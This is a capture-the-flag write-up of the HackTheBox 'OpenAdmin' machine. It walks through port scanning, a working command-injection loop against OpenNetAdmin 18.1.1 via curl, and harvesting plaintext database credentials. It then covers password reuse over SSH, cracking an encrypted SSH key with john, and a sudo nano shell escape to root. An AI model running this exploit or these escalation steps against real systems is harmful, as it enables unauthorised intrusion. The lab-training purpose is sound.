HackTheBox OpenAdmin Writeup

OpenAdmin is a nice and easy box with basic exploitation techniques and a moderate privilege escalation section.

Published on May 20, 2020


Let’s start off with a basic port enum using nmap, just so we know which services are available.

nmap -A openadmin.htb

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Upon accessing port 80 we are granted with a default Apache2 page.

Default Apache2 page.

Surely there must be something else so let’s try and find it.

gobuster dir -u http://openadmin.htb -w /usr/share/wordlists/common.txt


All of the paths above lead to a random html template page for different websites that didn’t have anything useful, well, aside from /music which did contain a link pointing to /ona.

Upon accessing the newly discovered path we find ourselves with an OpenNetAdmin application.

After a quick read of the index page we find the app version and determine it’s an outdated version (which is likely prone to vulnerabilities).

You are NOT on the latest release version.
Your version = v18.1.1


Searching on Google for “OpenNetAdmin 18.1.1” exploits leads us to this page, the exploit itself is nothing more than a curl request.


while true; do
 echo -n "www-data@openadmin:~$ "; read cmd
 curl -sd "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "http://openadmin.htb/ona/" | sed -n -e "/BEGIN/,/END/ p" | tail -n2 | head -n1

After executing the script we can do some internal poking around, a basic enum leads us to the database settings which includes plain text credentials.

// /opt/ona/www/local/config/database_settings.inc.php

  "DEFAULT" => array("databases" => array(0 =>
        "db_type" => "mysqli",
        "db_host" => "localhost",
        "db_login" => "ona_sys",
        "db_passwd" => "n1nj4W4rri0R!",
        "db_database" => "ona_default",
        "db_debug" => false,
    "description" => "Default data context",
    "context_color" => "#D3DBFF",

The parsed credentials are:


Next, checking /etc/passwd reveals an user named jimmy, maybe he uses the same password for everything…


Since the ssh service is running we could try to login as jimmy, so let’s give it a shot.

ssh jimmy@openadmin.htb

Using the credentials found previously worked and we are now ssh’d in.


A quick enum displays our current groups.

jimmy internal

Under /var/www we can find a folder with the internal group perssion, time to enum more.

drwxr-xr-x  6 www-data www-data 4096 Nov 22 15:59 html
drwxrwx---  2 jimmy    internal 4096 Nov 23 17:43 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21 16:07 ona -> /opt/ona/www

After inspecting each and every file within that folder we find something juicy.

// /var/www/internal/index.php

if ($_POST["username"] == "jimmy" && hash("sha512", $_POST["password"]) == "00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1") {
    $_SESSION["username"] = "jimmy";
    header("Location: /main.php");

The snippet above says if we do a POST request with proper credentials we are in (obviously). After using the sha512 hash on this online hash cracking website we find the user’s password.


The next step is to figure out where this supposed internal page is running. The following command will print out all the ports that are listening for connections.

ss -lt


In order to connect to that port we are going to use ssh to create a tunnel for us (since it’s only available internally), forwarding the high port on remote to our local machine.

ssh -L 52846: jimmy@

Now we can access it by navigating to http://localhost:52846.

After logging in using the credentials that we just cracked we can grab joanna’s private key, but there’s a catch, it’s encrypted… Fear not, we can always crack the password.

Save the key as id_rsa on your current working directory.

ssh2john id_rsa > hash.txt

Cracking the generated hash is as simple as:

john -w:/usr/share/wordlists/rockyou.txt hash.txt


Great, now that we have the key and password we can ssh in as joanna.

ssh joanna@openadmin.htb -i id_rsa

cat ~/user.txt


Privilege Escalation

Time to get root! The first command I always run is sudo -l.

Oh, nice… looks like we can something as sudo.

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Since nano is a common binary we could check GTFOBins, according to the page we can get a shell as root using:

sudo /bin/nano /opt/priv
reset; sh 1>&0 2>&0

Great, it worked!

cat ~/root.txt


And that’s it, thanks for reading!


Marlos Pomin
Full Stack Developer & Retoucher based in Brazil, also a casual pentester.